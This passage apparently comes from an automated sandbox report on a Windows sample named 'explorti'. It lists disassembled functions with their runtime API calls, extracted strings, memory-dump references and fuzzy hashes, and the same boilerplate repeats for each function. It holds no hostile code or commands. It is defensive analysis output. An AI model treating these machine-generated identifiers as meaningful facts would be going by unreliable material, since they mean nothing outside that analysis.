                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: Xtime_diff_to_millis2_xtime_get
                    • String ID: eBs
                    • API String ID: 531285432-1845495228
                    • Opcode ID: fe039039e11bc3ceeb69d6c1649bcd8ae09ab56206865174deaca1a1d601ba4b
                    • Instruction ID: 53056631f2146d6c787af7fdb316da32585c5b5e1467517dca0dd4c9cbf6321c
                    • Opcode Fuzzy Hash: fe039039e11bc3ceeb69d6c1649bcd8ae09ab56206865174deaca1a1d601ba4b
                    • Instruction Fuzzy Hash: 08214C75E5010DAFDF02EFA4CD819BEB7B8EF49714F500065FA05AB2A1DB30AD019BA0
                    Function 004170A9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wcsrchr
                    • String ID: .bat$.cmd$.com$.exe
                    • API String ID: 1752292252-4019086052
                    • Opcode ID: 7d0a1cb69021b6d0f39f1ea761f40551bb7bdbcb95cb2995ec399957783a982f
                    • Instruction ID: b173037940d8d4f8fddd7acda91545fb0327d1ab9f7549180e561e633e2dc037
                    • Opcode Fuzzy Hash: 7d0a1cb69021b6d0f39f1ea761f40551bb7bdbcb95cb2995ec399957783a982f
                    • Instruction Fuzzy Hash: B501C87771C625351615601A9D036B767A88F96BB8B2A002FFD84F73C2EE9DDC8241DC
                    Function 003F7010 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 236COMMON
                    Download Yara Rule
                    APIs
                    • __Mtx_init_in_situ.LIBCPMT ref: 003F723C
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_init_in_situ
                    • String ID: 0z?$py?$eBs
                    • API String ID: 3366076730-3098180262
                    • Opcode ID: fd8a969259d230204576ac4590d67ddcb3231b550b8979dcf54ec53070c5a54b
                    • Instruction ID: c4579cdbf0ba7b2153a8899b9b92b504058e5bcba8d031bc9da37a17eaaecd8c
                    • Opcode Fuzzy Hash: fd8a969259d230204576ac4590d67ddcb3231b550b8979dcf54ec53070c5a54b
                    • Instruction Fuzzy Hash: 66A149B0A01619CFDB21CFA9C9847AEBBF1FF48700F19855AE909AB351E7759D01CB90
                    Function 00424AB4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 199COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: __freea
                    • String ID: eBs
                    • API String ID: 240046367-1845495228
                    • Opcode ID: 135132e545dcf5008e08840360aa5112daa4c524ea71d81be31700a9d9e7d877
                    • Instruction ID: cd44c9a69589c142543867fe881338e7050696664a18e5dd72c9846e584bfa4d
                    • Opcode Fuzzy Hash: 135132e545dcf5008e08840360aa5112daa4c524ea71d81be31700a9d9e7d877
                    • Instruction Fuzzy Hash: 7B513772701226ABDF218F6AEC41EBB36A9DFC0750F56412AFD0497240D778DC5187A8
                    Function 003FC355 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 144COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: _xtime_get$Xtime_diff_to_millis2
                    • String ID: eBs
                    • API String ID: 2858396081-1845495228
                    • Opcode ID: 9ecce0707f54d0755729e8404b71c6e636a4654ecb859db9399d6a875035420e
                    • Instruction ID: 8f3c9f5c6a3f98f0c0b3a3c0be8755372e193e35def1b21f5b8e5c80cb94a802
                    • Opcode Fuzzy Hash: 9ecce0707f54d0755729e8404b71c6e636a4654ecb859db9399d6a875035420e
                    • Instruction Fuzzy Hash: 665181319A011ECBCF13DF25C6A15BDB7B4EF08714B25A45ADA05DB655C730ED40CBA4
                    Function 003F7840 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON
                    Download Yara Rule
                    APIs
                    • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 003F792C
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 003F7938
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 003F7941
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                    • String ID: L+D
                    • API String ID: 4078500453-2164315478
                    • Opcode ID: ed800f02de858c4f5bebfd6e9a509c9cb25dfb6515d87945b90c247c7b64f2df
                    • Instruction ID: 813122f308ae626683d5dcc9eac6009bf664dcd6a66baf2631ddf855184c1928
                    • Opcode Fuzzy Hash: ed800f02de858c4f5bebfd6e9a509c9cb25dfb6515d87945b90c247c7b64f2df
                    • Instruction Fuzzy Hash: E831C5B19043089BD721DF64D846A7BB7E8EF14350F100A3EEA4AC7641E7B5EA54C7E1
                    Function 0041C990 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strrchr
                    • String ID:
                    • API String ID: 3213747228-0
                    • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                    • Instruction ID: 844761f72ad8a6e8b9cde347a5518ccf466dbb91b476777589b3b09af6e4ad46
                    • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                    • Instruction Fuzzy Hash: 4CB1F2729442959FDB11CF28DC827EEBBA5EF45340F14816BD845EB341E6389D82CBA8
                    Function 0041FB5F Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 322COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: __fassign
                    • String ID: eBs
                    • API String ID: 3965848254-1845495228
                    • Opcode ID: f53cdb45429f0e4a7396a549b6905becc8f10d31f7a5796e44ada5f761443705
                    • Instruction ID: 8a9e1f5b5e16b3140858a13de256ddbc94cf458951a9b1cd9abef391437039a9
                    • Opcode Fuzzy Hash: f53cdb45429f0e4a7396a549b6905becc8f10d31f7a5796e44ada5f761443705
                    • Instruction Fuzzy Hash: 9EC1AC75D002489FCF15CFA8D8809EEBBB5FF49314F28016AE855B7352D634AD8ACB58
                    Function 003E25B0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 207COMMON
                    Download Yara Rule
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 003E2746
                    • ___std_exception_destroy.LIBVCRUNTIME ref: 003E27E0
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy___std_exception_destroy
                    • String ID: eBs
                    • API String ID: 2970364248-1845495228
                    • Opcode ID: ad34a4cb695a47b3f36ee39fc89344b965274ce7c88e9a8329e7cd2fa3e42e42
                    • Instruction ID: 2aeea9bcfde6b19542649110307e5d789f218c6022e9b5d8c4879767dea56dbc
                    • Opcode Fuzzy Hash: ad34a4cb695a47b3f36ee39fc89344b965274ce7c88e9a8329e7cd2fa3e42e42
                    • Instruction Fuzzy Hash: 6E71A271A002589FDF05CF98C881BDEFBB9EF59314F14821DE805B7281D774A984CBA5
                    Function 003EDAC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 189COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: list too long$eBs
                    • API String ID: 0-3523464180
                    • Opcode ID: 5fa92d662514bde3df7d36c90c603b50f342826358d2375fe2ade0276f243d35
                    • Instruction ID: 4409b00008d4d40a904345bff982cf55dffa7f5e66e29bb7c40ff6ec6e21bb4c
                    • Opcode Fuzzy Hash: 5fa92d662514bde3df7d36c90c603b50f342826358d2375fe2ade0276f243d35
                    • Instruction Fuzzy Hash: FF61B3B0D0435DABDB21DF64CD45BAAF7B4EF05700F1052AAE90CAB281EB74AA41CB55
                    Function 0041F1FF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___free_lconv_mon
                    • String ID: 8"D$`'D
                    • API String ID: 3903695350-755280474
                    • Opcode ID: d7917880fc889d0edd0e4f6727f0be155554c63d38b9a690f4340e06f91866f6
                    • Instruction ID: 92f6f20f9bed09e5d353476ad8f3eb4dc72acd0aecaeb97ffc5a113bb6479777
                    • Opcode Fuzzy Hash: d7917880fc889d0edd0e4f6727f0be155554c63d38b9a690f4340e06f91866f6
                    • Instruction Fuzzy Hash: B631CE716003089FEB21AE7AD905BC773E9AF10310F14446BE45ADB291EB79ECD98758
                    Function 003E2A10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON
                    Download Yara Rule
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 003E2A63
                    Strings
                    • This function cannot be called on a default constructed task, xrefs: 003E2A43
                    • eBs, xrefs: 003E2A36
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: This function cannot be called on a default constructed task$eBs
                    • API String ID: 2659868963-665623033
                    • Opcode ID: 803deac2f624befb8acaf1480e63561b2b58da0165319926b9dd2b81be40fc46
                    • Instruction ID: d321fbafe641f02f547baf04b61015936b483d4f59bbd5b810c2c70580ce3f8a
                    • Opcode Fuzzy Hash: 803deac2f624befb8acaf1480e63561b2b58da0165319926b9dd2b81be40fc46
                    • Instruction Fuzzy Hash: 9DF02B70A1030CABCB14DF68D8419EEF7FC9F15300F1082AEF804A7200EB70AA54CB99
                    Function 003EE240 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                    Download Yara Rule
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 003EE3D9
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: Xinvalid_argumentstd::_
                    • String ID: invalid stoi argument$eBs
                    • API String ID: 909987262-2681285792
                    • Opcode ID: d27b0445b6294fb5955e25f3baf3ab48a71975a2bd9d357ad16639d58aff8874
                    • Instruction ID: 7e4aa983fadd502483b689ea0e6a73f13af8114f75a62e12359ff94583ce3875
                    • Opcode Fuzzy Hash: d27b0445b6294fb5955e25f3baf3ab48a71975a2bd9d357ad16639d58aff8874
                    • Instruction Fuzzy Hash: 16F0F032A003249BD730AF699D02A6773E8DB46711F11093AFA109B691EBB07840C7AB